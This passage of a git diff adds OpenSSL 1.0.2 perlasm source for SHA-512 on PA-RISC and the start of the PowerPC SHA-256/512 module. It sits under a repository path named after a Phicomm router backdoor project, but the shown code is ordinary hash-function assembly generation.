+	$ST	$E,`4*$SZ`($ctx)
+	addl	@X[6],$G,$G
+	$ST	$F,`5*$SZ`($ctx)
+	addl	@X[7],$H,$H
+	$ST	$G,`6*$SZ`($ctx)
+	$ST	$H,`7*$SZ`($ctx)
+
+	cmpb,*<>,n $inp,$num,L\$oop
+	$PUSH	$inp,`-$FRAME_MARKER-3*$SIZE_T`(%sp)	; save $inp
+___
+if ($SZ==8 && $SIZE_T==4)	# SHA512 for 32-bit PA-RISC 1.0
+{{
+$code.=<<___;
+	b	L\$done
+	nop
+
+	.ALIGN	64
+L\$parisc1
+___
+
+@V=(  $Ahi,  $Alo,  $Bhi,  $Blo,  $Chi,  $Clo,  $Dhi,  $Dlo,
+      $Ehi,  $Elo,  $Fhi,  $Flo,  $Ghi,  $Glo,  $Hhi,  $Hlo) = 
+   ( "%r1", "%r2", "%r3", "%r4", "%r5", "%r6", "%r7", "%r8",
+     "%r9","%r10","%r11","%r12","%r13","%r14","%r15","%r16");
+$a0 ="%r17";
+$a1 ="%r18";
+$a2 ="%r19";
+$a3 ="%r20";
+$t0 ="%r21";
+$t1 ="%r22";
+$t2 ="%r28";
+$t3 ="%r29";
+$Tbl="%r31";
+
+@X=("%r23","%r24","%r25","%r26");	# zaps $num,$inp,$ctx
+
+sub ROUND_00_15_pa1 {
+my ($i,$ahi,$alo,$bhi,$blo,$chi,$clo,$dhi,$dlo,
+       $ehi,$elo,$fhi,$flo,$ghi,$glo,$hhi,$hlo,$flag)=@_;
+my ($Xhi,$Xlo,$Xnhi,$Xnlo) = @X;
+
+$code.=<<___ if (!$flag);
+	ldw	`-$XOFF+8*(($i+1)%16)`(%sp),$Xnhi
+	ldw	`-$XOFF+8*(($i+1)%16)+4`(%sp),$Xnlo	; load X[i+1]
+___
+$code.=<<___;
+	shd	$ehi,$elo,$Sigma1[0],$t0
+	 add	$Xlo,$hlo,$hlo
+	shd	$elo,$ehi,$Sigma1[0],$t1
+	 addc	$Xhi,$hhi,$hhi		; h += X[i]
+	shd	$ehi,$elo,$Sigma1[1],$t2
+	 ldwm	8($Tbl),$Xhi
+	shd	$elo,$ehi,$Sigma1[1],$t3
+	 ldw	-4($Tbl),$Xlo		; load K[i]
+	xor	$t2,$t0,$t0
+	xor	$t3,$t1,$t1
+	 and	$flo,$elo,$a0
+	 and	$fhi,$ehi,$a1
+	shd	$ehi,$elo,$Sigma1[2],$t2
+	 andcm	$glo,$elo,$a2
+	shd	$elo,$ehi,$Sigma1[2],$t3
+	 andcm	$ghi,$ehi,$a3
+	xor	$t2,$t0,$t0
+	xor	$t3,$t1,$t1		; Sigma1(e)
+	add	$Xlo,$hlo,$hlo
+	 xor	$a2,$a0,$a0
+	addc	$Xhi,$hhi,$hhi		; h += K[i]
+	 xor	$a3,$a1,$a1		; Ch(e,f,g)
+
+	 add	$t0,$hlo,$hlo
+	shd	$ahi,$alo,$Sigma0[0],$t0
+	 addc	$t1,$hhi,$hhi		; h += Sigma1(e)
+	shd	$alo,$ahi,$Sigma0[0],$t1	
+	 add	$a0,$hlo,$hlo
+	shd	$ahi,$alo,$Sigma0[1],$t2
+	 addc	$a1,$hhi,$hhi		; h += Ch(e,f,g)
+	shd	$alo,$ahi,$Sigma0[1],$t3
+
+	xor	$t2,$t0,$t0
+	xor	$t3,$t1,$t1
+	shd	$ahi,$alo,$Sigma0[2],$t2
+	and	$alo,$blo,$a0
+	shd	$alo,$ahi,$Sigma0[2],$t3
+	and	$ahi,$bhi,$a1
+	xor	$t2,$t0,$t0
+	xor	$t3,$t1,$t1		; Sigma0(a)
+
+	and	$alo,$clo,$a2
+	and	$ahi,$chi,$a3
+	xor	$a2,$a0,$a0
+	 add	$hlo,$dlo,$dlo
+	xor	$a3,$a1,$a1
+	 addc	$hhi,$dhi,$dhi		; d += h
+	and	$blo,$clo,$a2
+	 add	$t0,$hlo,$hlo
+	and	$bhi,$chi,$a3
+	 addc	$t1,$hhi,$hhi		; h += Sigma0(a)
+	xor	$a2,$a0,$a0
+	 add	$a0,$hlo,$hlo
+	xor	$a3,$a1,$a1		; Maj(a,b,c)
+	 addc	$a1,$hhi,$hhi		; h += Maj(a,b,c)
+
+___
+$code.=<<___ if ($i==15 && $flag);
+	extru	$Xlo,31,10,$Xlo
+	comiclr,= $LAST10BITS,$Xlo,%r0
+	b	L\$rounds_pa1
+	nop
+___
+push(@X,shift(@X)); push(@X,shift(@X));
+}
+
+sub ROUND_16_xx_pa1 {
+my ($Xhi,$Xlo,$Xnhi,$Xnlo) = @X;
+my ($i)=shift;
+$i-=16;
+$code.=<<___;
+	ldw	`-$XOFF+8*(($i+1)%16)`(%sp),$Xnhi
+	ldw	`-$XOFF+8*(($i+1)%16)+4`(%sp),$Xnlo	; load X[i+1]
+	ldw	`-$XOFF+8*(($i+9)%16)`(%sp),$a1
+	ldw	`-$XOFF+8*(($i+9)%16)+4`(%sp),$a0	; load X[i+9]
+	ldw	`-$XOFF+8*(($i+14)%16)`(%sp),$a3
+	ldw	`-$XOFF+8*(($i+14)%16)+4`(%sp),$a2	; load X[i+14]
+	shd	$Xnhi,$Xnlo,$sigma0[0],$t0
+	shd	$Xnlo,$Xnhi,$sigma0[0],$t1
+	 add	$a0,$Xlo,$Xlo
+	shd	$Xnhi,$Xnlo,$sigma0[1],$t2
+	 addc	$a1,$Xhi,$Xhi
+	shd	$Xnlo,$Xnhi,$sigma0[1],$t3
+	xor	$t2,$t0,$t0
+	shd	$Xnhi,$Xnlo,$sigma0[2],$t2
+	xor	$t3,$t1,$t1
+	extru	$Xnhi,`31-$sigma0[2]`,`32-$sigma0[2]`,$t3
+	xor	$t2,$t0,$t0
+	 shd	$a3,$a2,$sigma1[0],$a0
+	xor	$t3,$t1,$t1		; sigma0(X[i+1)&0x0f])
+	 shd	$a2,$a3,$sigma1[0],$a1
+	add	$t0,$Xlo,$Xlo
+	 shd	$a3,$a2,$sigma1[1],$t2
+	addc	$t1,$Xhi,$Xhi
+	 shd	$a2,$a3,$sigma1[1],$t3
+	xor	$t2,$a0,$a0
+	shd	$a3,$a2,$sigma1[2],$t2
+	xor	$t3,$a1,$a1
+	extru	$a3,`31-$sigma1[2]`,`32-$sigma1[2]`,$t3
+	xor	$t2,$a0,$a0
+	xor	$t3,$a1,$a1		; sigma0(X[i+14)&0x0f])
+	add	$a0,$Xlo,$Xlo
+	addc	$a1,$Xhi,$Xhi
+
+	stw	$Xhi,`-$XOFF+8*($i%16)`(%sp)
+	stw	$Xlo,`-$XOFF+8*($i%16)+4`(%sp)
+___
+&ROUND_00_15_pa1($i,@_,1);
+}
+$code.=<<___;
+	ldw	`0*4`($ctx),$Ahi		; load context
+	ldw	`1*4`($ctx),$Alo
+	ldw	`2*4`($ctx),$Bhi
+	ldw	`3*4`($ctx),$Blo
+	ldw	`4*4`($ctx),$Chi
+	ldw	`5*4`($ctx),$Clo
+	ldw	`6*4`($ctx),$Dhi
+	ldw	`7*4`($ctx),$Dlo
+	ldw	`8*4`($ctx),$Ehi
+	ldw	`9*4`($ctx),$Elo
+	ldw	`10*4`($ctx),$Fhi
+	ldw	`11*4`($ctx),$Flo
+	ldw	`12*4`($ctx),$Ghi
+	ldw	`13*4`($ctx),$Glo
+	ldw	`14*4`($ctx),$Hhi
+	ldw	`15*4`($ctx),$Hlo
+
+	extru	$inp,31,2,$t0
+	sh3addl	$t0,%r0,$t0
+	subi	32,$t0,$t0
+	mtctl	$t0,%cr11		; load %sar with align factor
+
+L\$oop_pa1
+	extru	$inp,31,2,$a3
+	comib,=	0,$a3,L\$aligned_pa1
+	sub	$inp,$a3,$inp
+
+	ldw	`0*4`($inp),$X[0]
+	ldw	`1*4`($inp),$X[1]
+	ldw	`2*4`($inp),$t2
+	ldw	`3*4`($inp),$t3
+	ldw	`4*4`($inp),$a0
+	ldw	`5*4`($inp),$a1
+	ldw	`6*4`($inp),$a2
+	ldw	`7*4`($inp),$a3
+	vshd	$X[0],$X[1],$X[0]
+	vshd	$X[1],$t2,$X[1]
+	stw	$X[0],`-$XOFF+0*4`(%sp)
+	ldw	`8*4`($inp),$t0
+	vshd	$t2,$t3,$t2
+	stw	$X[1],`-$XOFF+1*4`(%sp)
+	ldw	`9*4`($inp),$t1
+	vshd	$t3,$a0,$t3
+___
+{
+my @t=($t2,$t3,$a0,$a1,$a2,$a3,$t0,$t1);
+for ($i=2;$i<=(128/4-8);$i++) {
+$code.=<<___;
+	stw	$t[0],`-$XOFF+$i*4`(%sp)
+	ldw	`(8+$i)*4`($inp),$t[0]
+	vshd	$t[1],$t[2],$t[1]
+___
+push(@t,shift(@t));
+}
+for (;$i<(128/4-1);$i++) {
+$code.=<<___;
+	stw	$t[0],`-$XOFF+$i*4`(%sp)
+	vshd	$t[1],$t[2],$t[1]
+___
+push(@t,shift(@t));
+}
+$code.=<<___;
+	b	L\$collected_pa1
+	stw	$t[0],`-$XOFF+$i*4`(%sp)
+
+___
+}
+$code.=<<___;
+L\$aligned_pa1
+	ldw	`0*4`($inp),$X[0]
+	ldw	`1*4`($inp),$X[1]
+	ldw	`2*4`($inp),$t2
+	ldw	`3*4`($inp),$t3
+	ldw	`4*4`($inp),$a0
+	ldw	`5*4`($inp),$a1
+	ldw	`6*4`($inp),$a2
+	ldw	`7*4`($inp),$a3
+	stw	$X[0],`-$XOFF+0*4`(%sp)
+	ldw	`8*4`($inp),$t0
+	stw	$X[1],`-$XOFF+1*4`(%sp)
+	ldw	`9*4`($inp),$t1
+___
+{
+my @t=($t2,$t3,$a0,$a1,$a2,$a3,$t0,$t1);
+for ($i=2;$i<(128/4-8);$i++) {
+$code.=<<___;
+	stw	$t[0],`-$XOFF+$i*4`(%sp)
+	ldw	`(8+$i)*4`($inp),$t[0]
+___
+push(@t,shift(@t));
+}
+for (;$i<128/4;$i++) {
+$code.=<<___;
+	stw	$t[0],`-$XOFF+$i*4`(%sp)
+___
+push(@t,shift(@t));
+}
+$code.="L\$collected_pa1\n";
+}
+
+for($i=0;$i<16;$i++)	{ &ROUND_00_15_pa1($i,@V); unshift(@V,pop(@V)); unshift(@V,pop(@V)); }
+$code.="L\$rounds_pa1\n";
+for(;$i<32;$i++)	{ &ROUND_16_xx_pa1($i,@V); unshift(@V,pop(@V)); unshift(@V,pop(@V)); }
+
+$code.=<<___;
+	$POP	`-$FRAME_MARKER-2*$SIZE_T`(%sp),$ctx	; restore arguments
+	$POP	`-$FRAME_MARKER-3*$SIZE_T`(%sp),$inp
+	$POP	`-$FRAME_MARKER-4*$SIZE_T`(%sp),$num
+	ldo	`-$rounds*$SZ`($Tbl),$Tbl		; rewind $Tbl
+
+	ldw	`0*4`($ctx),$t1		; update context
+	ldw	`1*4`($ctx),$t0
+	ldw	`2*4`($ctx),$t3
+	ldw	`3*4`($ctx),$t2
+	ldw	`4*4`($ctx),$a1
+	ldw	`5*4`($ctx),$a0
+	ldw	`6*4`($ctx),$a3
+	add	$t0,$Alo,$Alo
+	ldw	`7*4`($ctx),$a2
+	addc	$t1,$Ahi,$Ahi
+	ldw	`8*4`($ctx),$t1
+	add	$t2,$Blo,$Blo
+	ldw	`9*4`($ctx),$t0
+	addc	$t3,$Bhi,$Bhi
+	ldw	`10*4`($ctx),$t3
+	add	$a0,$Clo,$Clo
+	ldw	`11*4`($ctx),$t2
+	addc	$a1,$Chi,$Chi
+	ldw	`12*4`($ctx),$a1
+	add	$a2,$Dlo,$Dlo
+	ldw	`13*4`($ctx),$a0
+	addc	$a3,$Dhi,$Dhi
+	ldw	`14*4`($ctx),$a3
+	add	$t0,$Elo,$Elo
+	ldw	`15*4`($ctx),$a2
+	addc	$t1,$Ehi,$Ehi
+	stw	$Ahi,`0*4`($ctx)
+	add	$t2,$Flo,$Flo
+	stw	$Alo,`1*4`($ctx)
+	addc	$t3,$Fhi,$Fhi
+	stw	$Bhi,`2*4`($ctx)
+	add	$a0,$Glo,$Glo
+	stw	$Blo,`3*4`($ctx)
+	addc	$a1,$Ghi,$Ghi
+	stw	$Chi,`4*4`($ctx)
+	add	$a2,$Hlo,$Hlo
+	stw	$Clo,`5*4`($ctx)
+	addc	$a3,$Hhi,$Hhi
+	stw	$Dhi,`6*4`($ctx)
+	ldo	`16*$SZ`($inp),$inp	; advance $inp
+	stw	$Dlo,`7*4`($ctx)
+	stw	$Ehi,`8*4`($ctx)
+	stw	$Elo,`9*4`($ctx)
+	stw	$Fhi,`10*4`($ctx)
+	stw	$Flo,`11*4`($ctx)
+	stw	$Ghi,`12*4`($ctx)
+	stw	$Glo,`13*4`($ctx)
+	stw	$Hhi,`14*4`($ctx)
+	comb,=	$inp,$num,L\$done
+	stw	$Hlo,`15*4`($ctx)
+	b	L\$oop_pa1
+	$PUSH	$inp,`-$FRAME_MARKER-3*$SIZE_T`(%sp)	; save $inp
+L\$done
+___
+}}
+$code.=<<___;
+	$POP	`-$FRAME-$SAVED_RP`(%sp),%r2		; standard epilogue
+	$POP	`-$FRAME+1*$SIZE_T`(%sp),%r4
+	$POP	`-$FRAME+2*$SIZE_T`(%sp),%r5
+	$POP	`-$FRAME+3*$SIZE_T`(%sp),%r6
+	$POP	`-$FRAME+4*$SIZE_T`(%sp),%r7
+	$POP	`-$FRAME+5*$SIZE_T`(%sp),%r8
+	$POP	`-$FRAME+6*$SIZE_T`(%sp),%r9
+	$POP	`-$FRAME+7*$SIZE_T`(%sp),%r10
+	$POP	`-$FRAME+8*$SIZE_T`(%sp),%r11
+	$POP	`-$FRAME+9*$SIZE_T`(%sp),%r12
+	$POP	`-$FRAME+10*$SIZE_T`(%sp),%r13
+	$POP	`-$FRAME+11*$SIZE_T`(%sp),%r14
+	$POP	`-$FRAME+12*$SIZE_T`(%sp),%r15
+	$POP	`-$FRAME+13*$SIZE_T`(%sp),%r16
+	$POP	`-$FRAME+14*$SIZE_T`(%sp),%r17
+	$POP	`-$FRAME+15*$SIZE_T`(%sp),%r18
+	bv	(%r2)
+	.EXIT
+	$POPMB	-$FRAME(%sp),%r3
+	.PROCEND
+	.STRINGZ "SHA`64*$SZ` block transform for PA-RISC, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+# Explicitly encode PA-RISC 2.0 instructions used in this module, so
+# that it can be compiled with .LEVEL 1.0. It should be noted that I
+# wouldn't have to do this, if GNU assembler understood .ALLOW 2.0
+# directive...
+
+my $ldd = sub {
+  my ($mod,$args) = @_;
+  my $orig = "ldd$mod\t$args";
+
+    if ($args =~ /(\-?[0-9]+)\(%r([0-9]+)\),%r([0-9]+)/) # format 3 suffices
+    {	my $opcode=(0x14<<26)|($2<<21)|($3<<16)|(($1&0x1FF8)<<1)|(($1>>13)&1);
+	$opcode|=(1<<3) if ($mod =~ /^,m/);
+	$opcode|=(1<<2) if ($mod =~ /^,mb/);
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+my $std = sub {
+  my ($mod,$args) = @_;
+  my $orig = "std$mod\t$args";
+
+    if ($args =~ /%r([0-9]+),(\-?[0-9]+)\(%r([0-9]+)\)/) # format 3 suffices
+    {	my $opcode=(0x1c<<26)|($3<<21)|($1<<16)|(($2&0x1FF8)<<1)|(($2>>13)&1);
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+my $extrd = sub {
+  my ($mod,$args) = @_;
+  my $orig = "extrd$mod\t$args";
+
+    # I only have ",u" completer, it's implicitly encoded...
+    if ($args =~ /%r([0-9]+),([0-9]+),([0-9]+),%r([0-9]+)/)	# format 15
+    {	my $opcode=(0x36<<26)|($1<<21)|($4<<16);
+	my $len=32-$3;
+	$opcode |= (($2&0x20)<<6)|(($2&0x1f)<<5);		# encode pos
+	$opcode |= (($len&0x20)<<7)|($len&0x1f);		# encode len
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    elsif ($args =~ /%r([0-9]+),%sar,([0-9]+),%r([0-9]+)/)	# format 12
+    {	my $opcode=(0x34<<26)|($1<<21)|($3<<16)|(2<<11)|(1<<9);
+	my $len=32-$2;
+	$opcode |= (($len&0x20)<<3)|($len&0x1f);		# encode len
+	$opcode |= (1<<13) if ($mod =~ /,\**=/);
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+my $shrpd = sub {
+  my ($mod,$args) = @_;
+  my $orig = "shrpd$mod\t$args";
+
+    if ($args =~ /%r([0-9]+),%r([0-9]+),([0-9]+),%r([0-9]+)/)	# format 14
+    {	my $opcode=(0x34<<26)|($2<<21)|($1<<16)|(1<<10)|$4;
+	my $cpos=63-$3;
+	$opcode |= (($cpos&0x20)<<6)|(($cpos&0x1f)<<5);		# encode sa
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    elsif ($args =~ /%r([0-9]+),%r([0-9]+),%sar,%r([0-9]+)/)	# format 11
+    {	sprintf "\t.WORD\t0x%08x\t; %s",
+		(0x34<<26)|($2<<21)|($1<<16)|(1<<9)|$3,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+sub assemble {
+  my ($mnemonic,$mod,$args)=@_;
+  my $opcode = eval("\$$mnemonic");
+
+    ref($opcode) eq 'CODE' ? &$opcode($mod,$args) : "\t$mnemonic$mod\t$args";
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+
+	s/shd\s+(%r[0-9]+),(%r[0-9]+),([0-9]+)/
+		$3>31 ? sprintf("shd\t%$2,%$1,%d",$3-32)	# rotation for >=32
+		:       sprintf("shd\t%$1,%$2,%d",$3)/e			or
+	# translate made up instructons: _ror, _shr, _align, _shl
+	s/_ror(\s+)(%r[0-9]+),/
+		($SZ==4 ? "shd" : "shrpd")."$1$2,$2,"/e			or
+
+	s/_shr(\s+%r[0-9]+),([0-9]+),/
+		$SZ==4 ? sprintf("extru%s,%d,%d,",$1,31-$2,32-$2)
+		:        sprintf("extrd,u%s,%d,%d,",$1,63-$2,64-$2)/e	or
+
+	s/_align(\s+%r[0-9]+,%r[0-9]+),/
+		($SZ==4 ? "vshd$1," : "shrpd$1,%sar,")/e		or
+
+	s/_shl(\s+%r[0-9]+),([0-9]+),/
+		$SIZE_T==4 ? sprintf("zdep%s,%d,%d,",$1,31-$2,32-$2)
+		:            sprintf("depd,z%s,%d,%d,",$1,63-$2,64-$2)/e;
+
+	s/^\s+([a-z]+)([\S]*)\s+([\S]*)/&assemble($1,$2,$3)/e if ($SIZE_T==4);
+
+	s/cmpb,\*/comb,/ if ($SIZE_T==4);
+
+	s/\bbv\b/bve/    if ($SIZE_T==8);
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-ppc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-ppc.pl
new file mode 100755
index 0000000..734f3c1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-ppc.pl
@@ -0,0 +1,792 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# I let hardware handle unaligned input, except on page boundaries
+# (see below for details). Otherwise straightforward implementation
+# with X vector in register bank.
+
+#			sha256		|	sha512
+# 			-m64	-m32	|	-m64	-m32
+# --------------------------------------+-----------------------
+# PPC970,gcc-4.0.0	+50%	+38%	|	+40%	+410%(*)
+# Power6,xlc-7		+150%	+90%	|	+100%	+430%(*)
+#
+# (*)	64-bit code in 32-bit application context, which actually is
+#	on TODO list. It should be noted that for safe deployment in
+#	32-bit *mutli-threaded* context asyncronous signals should be
+#	blocked upon entry to SHA512 block routine. This is because
+#	32-bit signaling procedure invalidates upper halves of GPRs.
+#	Context switch procedure preserves them, but not signaling:-(
+
+# Second version is true multi-thread safe. Trouble with the original
+# version was that it was using thread local storage pointer register.
+# Well, it scrupulously preserved it, but the problem would arise the
+# moment asynchronous signal was delivered and signal handler would
+# dereference the TLS pointer. While it's never the case in openssl
+# application or test suite, we have to respect this scenario and not
+# use TLS pointer register. Alternative would be to require caller to
+# block signals prior calling this routine. For the record, in 32-bit
+# context R2 serves as TLS pointer, while in 64-bit context - R13.
+
+$flavour=shift;
+$output =shift;
+
+if ($flavour =~ /64/) {
+	$SIZE_T=8;
+	$LRSAVE=2*$SIZE_T;
+	$STU="stdu";
+	$UCMP="cmpld";
+	$SHL="sldi";
+	$POP="ld";
+	$PUSH="std";
+} elsif ($flavour =~ /32/) {
+	$SIZE_T=4;
+	$LRSAVE=$SIZE_T;
+	$STU="stwu";
+	$UCMP="cmplw";
+	$SHL="slwi";
+	$POP="lwz";
+	$PUSH="stw";
+} else { die "nonsense $flavour"; }
+
+$LITTLE_ENDIAN = ($flavour=~/le$/) ? $SIZE_T : 0;
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}ppc-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/ppc-xlate.pl" and -f $xlate) or
+die "can't locate ppc-xlate.pl";
+
+open STDOUT,"| $^X $xlate $flavour $output" || die "can't call $xlate: $!";
+
+if ($output =~ /512/) {
+	$func="sha512_block_ppc";
+	$SZ=8;
+	@Sigma0=(28,34,39);
+	@Sigma1=(14,18,41);
+	@sigma0=(1,  8, 7);
+	@sigma1=(19,61, 6);
+	$rounds=80;
+	$LD="ld";
+	$ST="std";
+	$ROR="rotrdi";
+	$SHR="srdi";
+} else {
+	$func="sha256_block_ppc";
+	$SZ=4;
+	@Sigma0=( 2,13,22);
+	@Sigma1=( 6,11,25);
+	@sigma0=( 7,18, 3);
+	@sigma1=(17,19,10);
+	$rounds=64;
+	$LD="lwz";
+	$ST="stw";
+	$ROR="rotrwi";
+	$SHR="srwi";
+}
+
+$FRAME=32*$SIZE_T+16*$SZ;
+$LOCALS=6*$SIZE_T;
+
+$sp ="r1";
+$toc="r2";
+$ctx="r3";	# zapped by $a0
+$inp="r4";	# zapped by $a1
+$num="r5";	# zapped by $t0
+
+$T  ="r0";
+$a0 ="r3";
+$a1 ="r4";
+$t0 ="r5";
+$t1 ="r6";
+$Tbl="r7";
+
+$A  ="r8";
+$B  ="r9";
+$C  ="r10";
+$D  ="r11";
+$E  ="r12";
+$F  =$t1;	$t1 = "r0";	# stay away from "r13";
+$G  ="r14";
+$H  ="r15";
+
+@V=($A,$B,$C,$D,$E,$F,$G,$H);
+@X=("r16","r17","r18","r19","r20","r21","r22","r23",
+    "r24","r25","r26","r27","r28","r29","r30","r31");
+
+$inp="r31" if($SZ==4 || $SIZE_T==8);	# reassigned $inp! aliases with @X[15]
+
+sub ROUND_00_15 {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+$code.=<<___;
+	$ROR	$a0,$e,$Sigma1[0]
+	$ROR	$a1,$e,$Sigma1[1]
+	and	$t0,$f,$e
+	xor	$a0,$a0,$a1
+	add	$h,$h,$t1
+	andc	$t1,$g,$e
+	$ROR	$a1,$a1,`$Sigma1[2]-$Sigma1[1]`
+	or	$t0,$t0,$t1		; Ch(e,f,g)
+	add	$h,$h,@X[$i%16]
+	xor	$a0,$a0,$a1		; Sigma1(e)
+	add	$h,$h,$t0
+	add	$h,$h,$a0
+
+	$ROR	$a0,$a,$Sigma0[0]
+	$ROR	$a1,$a,$Sigma0[1]
+	and	$t0,$a,$b
+	and	$t1,$a,$c
+	xor	$a0,$a0,$a1
+	$ROR	$a1,$a1,`$Sigma0[2]-$Sigma0[1]`
+	xor	$t0,$t0,$t1
+	and	$t1,$b,$c
+	xor	$a0,$a0,$a1		; Sigma0(a)
+	add	$d,$d,$h
+	xor	$t0,$t0,$t1		; Maj(a,b,c)
+___
+$code.=<<___ if ($i<15);
+	$LD	$t1,`($i+1)*$SZ`($Tbl)
+___
+$code.=<<___;
+	add	$h,$h,$a0
+	add	$h,$h,$t0
+
+___
+}
+
+sub ROUND_16_xx {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+$i-=16;
+$code.=<<___;
+	$ROR	$a0,@X[($i+1)%16],$sigma0[0]
+	$ROR	$a1,@X[($i+1)%16],$sigma0[1]
+	$ROR	$t0,@X[($i+14)%16],$sigma1[0]
+	$ROR	$t1,@X[($i+14)%16],$sigma1[1]
+	xor	$a0,$a0,$a1
+	$SHR	$a1,@X[($i+1)%16],$sigma0[2]
+	xor	$t0,$t0,$t1
+	$SHR	$t1,@X[($i+14)%16],$sigma1[2]
+	add	@X[$i],@X[$i],@X[($i+9)%16]
+	xor	$a0,$a0,$a1		; sigma0(X[(i+1)&0x0f])
+	xor	$t0,$t0,$t1		; sigma1(X[(i+14)&0x0f])
+	$LD	$t1,`$i*$SZ`($Tbl)
+	add	@X[$i],@X[$i],$a0
+	add	@X[$i],@X[$i],$t0
+___
+&ROUND_00_15($i+16,$a,$b,$c,$d,$e,$f,$g,$h);
+}
+
+$code=<<___;
+.machine	"any"
+.text
+
+.globl	$func
+.align	6
+$func:
+	$STU	$sp,-$FRAME($sp)
+	mflr	r0
+	$SHL	$num,$num,`log(16*$SZ)/log(2)`
+
+	$PUSH	$ctx,`$FRAME-$SIZE_T*22`($sp)
+
+	$PUSH	r14,`$FRAME-$SIZE_T*18`($sp)
+	$PUSH	r15,`$FRAME-$SIZE_T*17`($sp)
+	$PUSH	r16,`$FRAME-$SIZE_T*16`($sp)
+	$PUSH	r17,`$FRAME-$SIZE_T*15`($sp)
+	$PUSH	r18,`$FRAME-$SIZE_T*14`($sp)
+	$PUSH	r19,`$FRAME-$SIZE_T*13`($sp)
+	$PUSH	r20,`$FRAME-$SIZE_T*12`($sp)
+	$PUSH	r21,`$FRAME-$SIZE_T*11`($sp)
+	$PUSH	r22,`$FRAME-$SIZE_T*10`($sp)
+	$PUSH	r23,`$FRAME-$SIZE_T*9`($sp)
+	$PUSH	r24,`$FRAME-$SIZE_T*8`($sp)
+	$PUSH	r25,`$FRAME-$SIZE_T*7`($sp)
+	$PUSH	r26,`$FRAME-$SIZE_T*6`($sp)
+	$PUSH	r27,`$FRAME-$SIZE_T*5`($sp)
+	$PUSH	r28,`$FRAME-$SIZE_T*4`($sp)
+	$PUSH	r29,`$FRAME-$SIZE_T*3`($sp)
+	$PUSH	r30,`$FRAME-$SIZE_T*2`($sp)
+	$PUSH	r31,`$FRAME-$SIZE_T*1`($sp)
+	$PUSH	r0,`$FRAME+$LRSAVE`($sp)
+___
+
+if ($SZ==4 || $SIZE_T==8) {
+$code.=<<___;
+	$LD	$A,`0*$SZ`($ctx)
+	mr	$inp,r4				; incarnate $inp
+	$LD	$B,`1*$SZ`($ctx)
+	$LD	$C,`2*$SZ`($ctx)
+	$LD	$D,`3*$SZ`($ctx)
+	$LD	$E,`4*$SZ`($ctx)
+	$LD	$F,`5*$SZ`($ctx)
+	$LD	$G,`6*$SZ`($ctx)
+	$LD	$H,`7*$SZ`($ctx)
+___
+} else {
+  for ($i=16;$i<32;$i++) {
+    $code.=<<___;
+	lwz	r$i,`$LITTLE_ENDIAN^(4*($i-16))`($ctx)
+___
+  }
+}
+
+$code.=<<___;
+	bl	LPICmeup
+LPICedup:
+	andi.	r0,$inp,3
+	bne	Lunaligned
+Laligned:
+	add	$num,$inp,$num
+	$PUSH	$num,`$FRAME-$SIZE_T*24`($sp)	; end pointer
+	$PUSH	$inp,`$FRAME-$SIZE_T*23`($sp)	; inp pointer
+	bl	Lsha2_block_private
+	b	Ldone
+
+; PowerPC specification allows an implementation to be ill-behaved
+; upon unaligned access which crosses page boundary. "Better safe
+; than sorry" principle makes me treat it specially. But I don't
+; look for particular offending word, but rather for the input
+; block which crosses the boundary. Once found that block is aligned
+; and hashed separately...
+.align	4
+Lunaligned:
+	subfic	$t1,$inp,4096
+	andi.	$t1,$t1,`4096-16*$SZ`	; distance to closest page boundary
+	beq	Lcross_page
+	$UCMP	$num,$t1
+	ble-	Laligned		; didn't cross the page boundary
+	subfc	$num,$t1,$num
+	add	$t1,$inp,$t1
+	$PUSH	$num,`$FRAME-$SIZE_T*25`($sp)	; save real remaining num
+	$PUSH	$t1,`$FRAME-$SIZE_T*24`($sp)	; intermediate end pointer
+	$PUSH	$inp,`$FRAME-$SIZE_T*23`($sp)	; inp pointer
+	bl	Lsha2_block_private
+	; $inp equals to the intermediate end pointer here
+	$POP	$num,`$FRAME-$SIZE_T*25`($sp)	; restore real remaining num
+Lcross_page:
+	li	$t1,`16*$SZ/4`
+	mtctr	$t1
+___
+if ($SZ==4 || $SIZE_T==8) {
+$code.=<<___;
+	addi	r20,$sp,$LOCALS			; aligned spot below the frame
+Lmemcpy:
+	lbz	r16,0($inp)
+	lbz	r17,1($inp)
+	lbz	r18,2($inp)
+	lbz	r19,3($inp)
+	addi	$inp,$inp,4
+	stb	r16,0(r20)
+	stb	r17,1(r20)
+	stb	r18,2(r20)
+	stb	r19,3(r20)
+	addi	r20,r20,4
+	bdnz	Lmemcpy
+___
+} else {
+$code.=<<___;
+	addi	r12,$sp,$LOCALS			; aligned spot below the frame
+Lmemcpy:
+	lbz	r8,0($inp)
+	lbz	r9,1($inp)
+	lbz	r10,2($inp)
+	lbz	r11,3($inp)
+	addi	$inp,$inp,4
+	stb	r8,0(r12)
+	stb	r9,1(r12)
+	stb	r10,2(r12)
+	stb	r11,3(r12)
+	addi	r12,r12,4
+	bdnz	Lmemcpy
+___
+}
+
+$code.=<<___;
